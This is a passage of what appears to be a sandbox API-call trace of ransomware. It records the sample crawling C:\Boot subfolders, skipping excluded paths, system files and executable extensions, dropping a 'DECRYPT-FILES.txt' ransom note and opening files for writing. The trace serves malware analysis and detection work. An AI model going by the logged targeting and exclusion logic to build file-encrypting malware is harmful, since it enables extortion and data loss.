(lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Games\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\All Users") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="AhnLab") returned 0x0 [0179.648] StrStrW (lpFirst="C:\\Boot\\pt-PT\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.648] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0179.648] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.648] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-PT\\\\0a16c9.tmp") returned 25 [0179.649] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\\\0a16c9.tmp" (normalized: "c:\\boot\\pt-pt\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.649] GetLastError () returned 0x5 [0179.649] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0179.649] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.649] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\pt-PT\\\\DECRYPT-FILES.txt") returned 32 [0179.649] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\pt-pt\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.649] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0179.649] lstrcatW (in: lpString1="C:\\Boot\\pt-PT\\", lpString2="*" | out: lpString1="C:\\Boot\\pt-PT\\*") returned="C:\\Boot\\pt-PT\\*" [0179.649] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.649] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.649] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.649] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.649] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.649] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.650] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.650] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.650] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.650] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.650] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.650] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.650] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.650] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0179.650] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.650] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\pt-PT\\" | out: lpString1="C:\\Boot\\pt-PT\\") returned="C:\\Boot\\pt-PT\\" [0179.650] lstrcatW (in: lpString1="C:\\Boot\\pt-PT\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\Boot\\pt-PT\\bootmgr.exe.mui" [0179.650] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.650] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.651] CloseHandle (hObject=0x0) returned 0 [0179.652] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.652] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.652] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.652] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.652] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.652] CloseHandle (hObject=0xffffffff) returned 0 [0179.652] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0179.652] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0179.652] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0179.652] lstrcatW (in: lpString1="ru-RU", lpString2="\\" | out: lpString1="ru-RU\\") returned="ru-RU\\" [0179.652] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ru-RU\\" | out: lpString1="C:\\Boot\\ru-RU\\") returned="C:\\Boot\\ru-RU\\" [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Program Files") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch=":\\Windows") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Games\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\All Users") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="AhnLab") returned 0x0 [0179.652] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.653] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0179.653] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.653] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\ru-RU\\\\0a16c9.tmp") returned 25 [0179.653] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\\\0a16c9.tmp" (normalized: "c:\\boot\\ru-ru\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.653] GetLastError () returned 0x5 [0179.653] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0179.653] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.653] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\ru-RU\\\\DECRYPT-FILES.txt") returned 32 [0179.653] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\ru-ru\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.653] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0179.653] lstrcatW (in: lpString1="C:\\Boot\\ru-RU\\", lpString2="*" | out: lpString1="C:\\Boot\\ru-RU\\*") returned="C:\\Boot\\ru-RU\\*" [0179.653] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.653] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.653] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.653] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.653] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.653] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.653] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.653] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.653] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.653] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.654] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.654] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.654] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.654] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.654] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.654] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.654] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.654] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.654] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.654] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.654] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.654] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0179.654] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.654] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\ru-RU\\" | out: lpString1="C:\\Boot\\ru-RU\\") returned="C:\\Boot\\ru-RU\\" [0179.654] lstrcatW (in: lpString1="C:\\Boot\\ru-RU\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\Boot\\ru-RU\\bootmgr.exe.mui" [0179.654] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.654] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.654] CloseHandle (hObject=0x0) returned 0 [0179.654] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.654] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.654] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.655] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.655] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.655] CloseHandle (hObject=0xffffffff) returned 0 [0179.655] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0179.655] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0179.655] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0179.655] lstrcatW (in: lpString1="sv-SE", lpString2="\\" | out: lpString1="sv-SE\\") returned="sv-SE\\" [0179.655] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="sv-SE\\" | out: lpString1="C:\\Boot\\sv-SE\\") returned="C:\\Boot\\sv-SE\\" [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Program Files") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch=":\\Windows") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Games\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\All Users") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="AhnLab") returned 0x0 [0179.655] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.655] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0179.655] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.655] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\sv-SE\\\\0a16c9.tmp") returned 25 [0179.655] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\\\0a16c9.tmp" (normalized: "c:\\boot\\sv-se\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.655] GetLastError () returned 0x5 [0179.655] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0179.655] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.656] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\sv-SE\\\\DECRYPT-FILES.txt") returned 32 [0179.656] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\sv-se\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.657] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0179.657] lstrcatW (in: lpString1="C:\\Boot\\sv-SE\\", lpString2="*" | out: lpString1="C:\\Boot\\sv-SE\\*") returned="C:\\Boot\\sv-SE\\*" [0179.657] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.657] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.657] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.657] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.657] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.657] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.657] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.657] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.657] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.657] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.657] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.657] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.657] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0179.657] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.657] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\sv-SE\\" | out: lpString1="C:\\Boot\\sv-SE\\") returned="C:\\Boot\\sv-SE\\" [0179.657] lstrcatW (in: lpString1="C:\\Boot\\sv-SE\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\Boot\\sv-SE\\bootmgr.exe.mui" [0179.658] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.658] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.658] CloseHandle (hObject=0x0) returned 0 [0179.658] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.659] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.659] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.659] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, 